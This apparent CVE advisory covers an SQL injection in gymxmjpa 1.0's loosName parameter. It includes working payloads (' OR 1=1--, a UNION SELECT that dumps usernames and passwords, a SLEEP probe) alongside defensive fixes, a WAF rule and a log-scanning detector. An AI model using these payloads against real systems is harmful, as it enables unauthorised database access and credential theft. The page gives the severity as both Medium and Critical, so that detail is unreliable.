The CVE-2025-0408 vulnerability in liujianview gymxmjpa 1.0 allows remote attackers to execute arbitrary SQL queries via the `loosName` parameter in the `LoosDaoImpl` function (LoosController.java). The application fails to sanitize user-supplied input before concatenating it into SQL statements, enabling classic SQL injection. Attackers can manipulate database queries, extract sensitive data, or execute administrative operations. The vulnerability is exploitable over the network without authentication, earning a CVSS 4.0 score of 5.3 (Medium).
DailyCVE Form
Platform: liujianview gymxmjpa
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 01/12/2025
What Undercode Say:
Exploitation:
curl -X GET "http://target.com/api/loos?loosName=' OR 1=1--"
SQL Payload:
' UNION SELECT username, password FROM users--
Detection:
import requests

# Time-based probe: a response delayed by the injected SLEEP(5) indicates the
# parameter reaches the SQL engine unsanitized.
response = requests.get("http://target.com/api/loos?loosName=1' AND SLEEP(5)--")
if response.elapsed.total_seconds() >= 5:
    print("Vulnerable to SQLi")
Mitigation:
// Use PreparedStatement in LoosDaoImpl: the value is bound as a parameter,
// never concatenated into the SQL text.
String query = "SELECT * FROM loos WHERE name = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, loosName);
ResultSet rs = stmt.executeQuery();
Log Analysis:
grep -i "sql.error" /var/log/tomcat/catalina.out
WAF Rule:
location /api/loos {
    # Stopgap until the DAO is patched: reject obvious SQL metacharacters in the
    # loosName query parameter (nginx syntax; "deny" only accepts addresses).
    # A keyword blocklist is easily bypassed and is no substitute for parameterized queries.
    if ($arg_loosName ~* "('|;|--|union)") {
        return 403;
    }
}
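Complementing the log-analysis and WAF steps above, this added example (not part of the advisory) scans access-log lines for /api/loos requests and URL-decodes the loosName value before checking it, so percent-encoded and double-encoded payloads that a literal "'|;|--|UNION" rule would miss still surface. The log lines are constructed, not captured from a real system.

```python
"""Flag access-log requests whose loosName parameter carries SQL metacharacters."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Request field of a combined/common log line: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators from the advisory's WAF rule plus the time-based probe, applied after decoding.
SQLI_RE = re.compile(r"'|;|--|\bunion\b|\bsleep\s*\(", re.IGNORECASE)


def loos_name_from_line(line):
    """Return the decoded loosName value of a /api/loos request, or None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/api/loos":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("loosName")
    if not values:
        return None
    # parse_qs already decoded once; decode again so double-encoded
    # payloads (%2527 -> %27 -> ') are inspected in their final form.
    return unquote_plus(values[0])


def suspicious_requests(lines):
    """Return (client_ip, decoded_loosName) for requests matching SQLI_RE."""
    hits = []
    for line in lines:
        value = loos_name_from_line(line)
        if value is not None and SQLI_RE.search(value):
            hits.append((line.split(" ", 1)[0], value))
    return hits


# Constructed sample log lines (Tomcat/nginx common log format).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2025:10:01:02 +0000] "GET /api/loos?loosName=treadmill HTTP/1.1" 200 512
10.0.0.9 - - [12/Jan/2025:10:01:07 +0000] "GET /api/loos?loosName=%27%20OR%201%3D1-- HTTP/1.1" 200 9812
10.0.0.9 - - [12/Jan/2025:10:01:09 +0000] "GET /api/loos?loosName=1%2527%20AND%20SLEEP(5)-- HTTP/1.1" 200 40
10.0.0.7 - - [12/Jan/2025:10:02:00 +0000] "GET /api/other?loosName=%27 HTTP/1.1" 404 0
"""

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG.splitlines()):
        print(f"{ip}: suspicious loosName={value!r}")
```

Feed real access logs in with `suspicious_requests(open(path))`; the fourth sample line shows that the same payload on a different path is ignored, so widen the path check if other endpoints accept loosName.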
Patch Verification:
# jar extracts into the WEB-INF/... directory tree, so inspect the class at that path.
jar xf gymxmjpa.war WEB-INF/classes/com/liujian/gymxmjpa/controller/LoosController.class
strings WEB-INF/classes/com/liujian/gymxmjpa/controller/LoosController.class | grep -i "preparedstatement"
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode